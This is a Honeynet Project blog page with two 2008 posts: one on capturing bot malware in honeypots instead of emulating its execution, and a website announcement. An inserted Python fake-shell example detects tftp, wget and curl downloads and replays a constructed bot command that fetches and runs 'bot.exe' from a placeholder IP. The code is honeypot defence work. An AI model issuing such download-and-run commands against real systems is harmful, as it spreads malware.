No more emulation!

27 Aug 2008 Tillmann Werner

Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they

  • send some exploit code to the victim that opens a shell,
  • connect to that shell or let the shell connect back,
  • invoke commands to download the actual malware binary,
  • execute the malware.

Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want the malware to be executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.
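The following is an added illustration, not code from the original post: a minimal fake-shell handler that recognises the download and execute stages listed above, records what the bot asked for, and hands the sample off as a submission record instead of running it. The command patterns, canned replies, record format and the constructed sample exchange are all assumptions chosen for illustration.

```python
# Added example (not from the original post): a fake-shell handler for a
# honeypot that records the download/execute stages of a multi-stage bot
# attack instead of executing anything. Patterns and replies are assumptions.
import hashlib
import re
from dataclasses import dataclass, field

# Download commands a bot typically issues through the captured shell
# (assumed patterns; extend them with what shows up in your own logs).
DOWNLOAD_PATTERNS = [
    re.compile(r"\btftp\b.*?\s(?P<host>\S+)\s+get\s+(?P<file>\S+)", re.I),
    re.compile(r"\b(?:wget|curl)\b.*?(?P<url>https?://\S+)", re.I),
]
# Anything that looks like an attempt to run the downloaded binary.
EXEC_PATTERN = re.compile(r"^(?:start\s+|\./|cmd\s+/c\s+)?\S+\.exe\b|^\./\S+", re.I)

@dataclass
class Session:
    downloads: list = field(default_factory=list)      # (source, file name)
    exec_attempts: list = field(default_factory=list)  # commands never run
    transcript: list = field(default_factory=list)

def handle_command(session: Session, line: str) -> str:
    """Record what the bot wants and return a canned reply; nothing executes."""
    line = line.strip()
    session.transcript.append(line)
    for pat in DOWNLOAD_PATTERNS:
        m = pat.search(line)
        if m:
            src = m.groupdict().get("url") or m.group("host")
            name = m.groupdict().get("file") or src.rsplit("/", 1)[-1]
            session.downloads.append((src, name))
            return "Transfer successful: 0 bytes\n"  # keeps the bot talking
    if EXEC_PATTERN.search(line):
        session.exec_attempts.append(line)
        return ""  # silently "succeed" without touching the binary
    return ""

def submission_record(session: Session, sample: bytes) -> dict:
    """What goes to the analysis service in place of execution on the honeypot."""
    src, name = session.downloads[-1]
    return {"sha256": hashlib.sha256(sample).hexdigest(), "source": src,
            "name": name, "executed_on_honeypot": False,
            "commands_seen": len(session.transcript)}

if __name__ == "__main__":
    s = Session()  # constructed exchange, not real traffic
    for cmd in ["tftp -i 198.51.100.7 GET bot.exe", "bot.exe", "exit"]:
        handle_command(s, cmd)
    print(submission_record(s, b"MZ-constructed-sample"))
```

The sample bytes passed to submission_record would in practice be fetched by the honeypot itself from the recorded source, never by the bot's own command.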

Our New Website

12 Aug 2008 Lance Spitzner

Greetings! First I want to start off by thanking Steve Mumford, Christine Kilger, Jamie Riden, David Watson and Markus Koetter; they are the people that made our new website possible. Second, I wanted to share with you how excited I am about this. One of the challenges we have had for years is coordinating all the different research projects our members are doing. This site will allow each person to share as much as they want, however they want. Expect things like individual blogs, special interest groups and other research areas. Finally, I hope you, the community, find this website useful, as it makes it easier for you to access the information and tools you need. As always, if you have questions or suggestions we would love to hear from you at [email protected].